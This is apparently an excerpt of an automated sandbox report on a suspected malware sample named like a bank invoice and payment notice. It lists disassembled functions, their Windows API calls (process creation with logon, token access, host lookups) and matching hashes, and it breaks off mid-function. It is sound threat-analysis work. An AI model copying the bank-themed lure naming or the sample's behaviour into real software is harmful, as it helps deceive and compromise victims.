                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AllocateHeap_free
                    • String ID:
                    • API String ID: 614378929-0
                    • Opcode ID: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                    • Instruction ID: 4e60240ed5239a1931f22d4cfcc3926e54f2fb67b2be65d121e45a594b57503a
                    • Opcode Fuzzy Hash: a900ec1250b1258bf4754ca65f72d828a4674a6bff759937ad9fb6d44bd09585
                    • Instruction Fuzzy Hash: 1111A733904A15AFCB312F74AC457DF37D86F1A3B4B20242AFA45BE291DFB5A9409790
                    Function 00E84531 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00E84560
                      • Part of subcall function 00E8410D: _memset.LIBCMT ref: 00E8418D
                      • Part of subcall function 00E8410D: _wcscpy.LIBCMT ref: 00E841E1
                      • Part of subcall function 00E8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E841F1
                    • KillTimer.USER32(?,00000001,?,?), ref: 00E845B5
                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E845C4
                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EBD6CE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                    • String ID:
                    • API String ID: 1378193009-0
                    • Opcode ID: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                    • Instruction ID: f803c777e958a5c75cd72d8bf9b2111a819b8bc15d8fc13c0b3b7aa029d8ef0b
                    • Opcode Fuzzy Hash: cc52dd7cd0599d42539537559fba9ad8d6d918fdf285b97258a3db872fef6579
                    • Instruction Fuzzy Hash: 4A21DDB0908744AFEB339B24DC45BEBBBECDF11308F04109EE69DA6185D7745A849B51
                    Function 00ED8AF9 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00ED8B2A
                    • OpenProcessToken.ADVAPI32(00000000), ref: 00ED8B31
                    • CloseHandle.KERNEL32(00000004), ref: 00ED8B4B
                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ED8B7A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                    • String ID:
                    • API String ID: 2621361867-0
                    • Opcode ID: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                    • Instruction ID: ad4c9a9aadc5ae8a0494ad93ccf1dd4a6073ecf9d2b675c7823d85bb5c8fdb0d
                    • Opcode Fuzzy Hash: 9c9d09292e05cf6ca4de2af2df22a13eb8dc84a71035c6f6e2ef76015280f998
                    • Instruction Fuzzy Hash: 76116AB650020DABDF118FA4EE49FDE7BA9FF08708F045066FE04A2160C7729D65EB61
                    Function 00EF667C Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EE7B20,?,?,00000000), ref: 00E85B8C
                      • Part of subcall function 00E85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EE7B20,?,?,00000000,?,?), ref: 00E85BB0
                    • gethostbyname.WS2_32(?), ref: 00EF66AC
                    • WSAGetLastError.WS2_32(00000000), ref: 00EF66B7
                    • _memmove.LIBCMT ref: 00EF66E4
                    • inet_ntoa.WS2_32(?), ref: 00EF66EF
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                    • String ID:
                    • API String ID: 1504782959-0
                    • Opcode ID: 9687d3b6d9279ff014f0a381a68601943be3ca39d69f58485081be562854faf1
                    • Instruction ID: d5f22b2553ea1d581e38e90b7d29c482d95ebbe00a8ab1159d9697cc10ec211d
                    • Opcode Fuzzy Hash: 9687d3b6d9279ff014f0a381a68601943be3ca39d69f58485081be562854faf1
                    • Instruction Fuzzy Hash: C6110A36900509ABCB04FBA4DD86DEEB7F8BF58310B145065F50AB71A2DF30AE04DB61
                    Function 00ED9023 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00ED9043
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9055
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED906B
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00ED9086
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                    • Instruction ID: c142b6c7c5ea844939fce7221466bb97d98c21ce2fbb86ef7063f1c164533823
                    • Opcode Fuzzy Hash: f19b1983133d010d2832afb85f90c85e30ffd726bd577b53654478aa2ebd65ba
                    • Instruction Fuzzy Hash: 5E115E79900218FFDB10DFA5CC84E9DBBB4FB48310F204096E904B7290D6726E11DB90
                    Function 00EE1652 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                    Download Yara Rule
                    APIs
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE166F
                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE1694
                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE169E
                    • Sleep.KERNEL32(?,?,?,?,?,?,?,00EE01FD,?,00EE1250,?,00008000), ref: 00EE16D1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CounterPerformanceQuerySleep
                    • String ID:
                    • API String ID: 2875609808-0
                    • Opcode ID: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                    • Instruction ID: 975ac6c50239a7cb2f2da9e8baefeaca263e9220018766cb9c759ee5ed75523f
                    • Opcode Fuzzy Hash: 61447c74a22b3e563941ea49928c5a8daef254f57e13b10f8376545193d712e0
                    • Instruction Fuzzy Hash: B9116131C0055ED7CF10AFA6D948AEEBF78FF09751F455099E941B6240CB3055A0DBD6
                    Function 00EB7207 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction ID: c8ddb803551c503431d02664974b3fbdf66d69d9261d14d2f44d9447e9bc8ed9
                    • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                    • Instruction Fuzzy Hash: A901807205414ABBCF125E84CC018EE3F62BF99345F099515FE9868831D237C9B1AB81
                    Function 00F0B57F Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                    Download Yara Rule
                    APIs
                    • GetWindowRect.USER32(?,?), ref: 00F0B59E
                    • ScreenToClient.USER32(?,?), ref: 00F0B5B6
                    • ScreenToClient.USER32(?,?), ref: 00F0B5DA
                    • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F0B5F5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ClientRectScreen$InvalidateWindow
                    • String ID:
                    • API String ID: 357397906-0
                    • Opcode ID: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
                    • Instruction ID: 238caa0db0aa26c3ac00f18011a016a5a71d980b0e87ea3491fb7ceace73d799
                    • Opcode Fuzzy Hash: d7cf58035992bbe17566143cffe994fdb8bbac003b5f71fc8686deafc0246b98
                    • Instruction Fuzzy Hash: CA1146B5D0020DEFDB51CF99C8449EEFBB9FB08311F104166E914E3620D735AA559F50
                    Function 00F0B8EF Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 00F0B8FE
                    • _memset.LIBCMT ref: 00F0B90D
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F47F20,00F47F64), ref: 00F0B93C
                    • CloseHandle.KERNEL32 ref: 00F0B94E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memset$CloseCreateHandleProcess
                    • String ID:
                    • API String ID: 3277943733-0
                    • Opcode ID: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                    • Instruction ID: 7b44dbe38d8cd852df88c63f64fd2c59d097946e1c2eb9a6b23c60136c2c9be6
                    • Opcode Fuzzy Hash: 676197dc152c1c3d058b71441e7334ec09b2484964e2d0aff9abbfafa3ff00cb
                    • Instruction Fuzzy Hash: C3F089B55443087BF6203771AC45F7B7A9CEB1A774F001420BF08D5292D7755D08A7E8
                    Function 00EE6E7C Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                    Download Yara Rule
                    APIs
                    • RtlEnterCriticalSection.NTDLL(?), ref: 00EE6E88
                      • Part of subcall function 00EE794E: _memset.LIBCMT ref: 00EE7983
                    • _memmove.LIBCMT ref: 00EE6EAB
                    • _memset.LIBCMT ref: 00EE6EB8
                    • RtlLeaveCriticalSection.NTDLL(?), ref: 00EE6EC8
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CriticalSection_memset$EnterLeave_memmove
                    • String ID:
                    • API String ID: 48991266-0
                    • Opcode ID: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                    • Instruction ID: 13d513b36a52386e37c3e503ff8f7b76f3aa8ae6011097de08bb33e607ce022b
                    • Opcode Fuzzy Hash: 0fc89daafe9688ef86fe8b2305540cd3adabfec9b8138eb8ed9ce05e96c686b0
                    • Instruction Fuzzy Hash: A2F0543A100204ABCF116F55DC85A49BB69EF49320F048061FE086E217C731E951DBB4
                    Function 00F0C00C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00E8134D
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8135C
                      • Part of subcall function 00E812F3: BeginPath.GDI32(?), ref: 00E81373
                      • Part of subcall function 00E812F3: SelectObject.GDI32(?,00000000), ref: 00E8139C
                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F0C030
                    • LineTo.GDI32(00000000,?,?), ref: 00F0C03D
                    • EndPath.GDI32(00000000), ref: 00F0C04D
                    • StrokePath.GDI32(00000000), ref: 00F0C05B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                    • String ID:
                    • API String ID: 1539411459-0
                    • Opcode ID: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                    • Instruction ID: 01a9b11ef6dfb0652765e1215df6be5d6b7bcc10fb0a2a4171b3d20ac0e17389
                    • Opcode Fuzzy Hash: 7dabf2c0a1f2978c7ae33ab4c999c2ad426deb47d617148d61a66eefa8cbc478
                    • Instruction Fuzzy Hash: E9F0BE3100025DBBDB226F50AC09FCE3F98BF16320F048100FA11A14E287B50569FBD5
                    Function 00EDA37C Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EDA399
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EDA3AC
                    • GetCurrentThreadId.KERNEL32 ref: 00EDA3B3
                    • AttachThreadInput.USER32(00000000), ref: 00EDA3BA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                    • String ID:
                    • API String ID: 2710830443-0
                    • Opcode ID: aec30449d10e64d0d06d0ad62e944e20641e924b55f362ff0d01132ba86b1ee4
                    • Instruction ID: df4d992b058998bead3a4935919ac33da755fae2aa0277e6e848113bbeabfa7e
                    • Opcode Fuzzy Hash: aec30449d10e64d0d06d0ad62e944e20641e924b55f362ff0d01132ba86b1ee4
                    • Instruction Fuzzy Hash: FDE0A531545228BADB205FA2DC0DEDB7E5DFF167A1F048035B50995460CA72C645ABA1
                    Function 00E82218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000008), ref: 00E82231
                    • SetTextColor.GDI32(?,000000FF), ref: 00E8223B
                    • SetBkMode.GDI32(?,00000001), ref: 00E82250
                    • GetStockObject.GDI32(00000005), ref: 00E82258
                    • GetWindowDC.USER32(?,00000000), ref: 00EBC0D3
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 00EBC0E0
                    • GetPixel.GDI32(00000000,?,00000000), ref: 00EBC0F9
                    • GetPixel.GDI32(00000000,00000000,?), ref: 00EBC112
                    • GetPixel.GDI32(00000000,?,?), ref: 00EBC132
                    • ReleaseDC.USER32(?,00000000), ref: 00EBC13D
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                    • String ID:
                    • API String ID: 1946975507-0
                    • Opcode ID: 96148fb70cef16048622eae5dd13737ca353dc3db9eee698fa53ea7e8a335aef
                    • Instruction ID: ce205c6011112767ac53fbb6b79edf741db160163c5e9ac5e24471337ff254dc
                    • Opcode Fuzzy Hash: 96148fb70cef16048622eae5dd13737ca353dc3db9eee698fa53ea7e8a335aef
                    • Instruction Fuzzy Hash: 03E06D32504248EBDB315FA8FC0D7D83B20FB05336F148366FA69A80E187714994EB12
                    Function 00ED8C5A Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentThread.KERNEL32 ref: 00ED8C63
                    • OpenThreadToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C6A
                    • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00ED882E), ref: 00ED8C77
                    • OpenProcessToken.ADVAPI32(00000000,?,?,?,00ED882E), ref: 00ED8C7E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: CurrentOpenProcessThreadToken
                    • String ID:
                    • API String ID: 3974789173-0
                    • Opcode ID: 0f672e291d416232f69b80d6d9cc9b7fe60d5d77e0d9a51b7b81036c574253a7
                    • Instruction ID: ed63babdb02e4a3681a54b84725ddff2e23c0d1a06626631041781e23808257e
                    • Opcode Fuzzy Hash: 0f672e291d416232f69b80d6d9cc9b7fe60d5d77e0d9a51b7b81036c574253a7
                    • Instruction Fuzzy Hash: 49E08636642215DBD7305FB06E0CB567BBCFF50796F054828B245D9040DA34844ADB71
                    Function 00EC2187 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                    Download Yara Rule
                    APIs
                    • GetDesktopWindow.USER32 ref: 00EC2187
                    • GetDC.USER32(00000000), ref: 00EC2191
                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00EC21B1
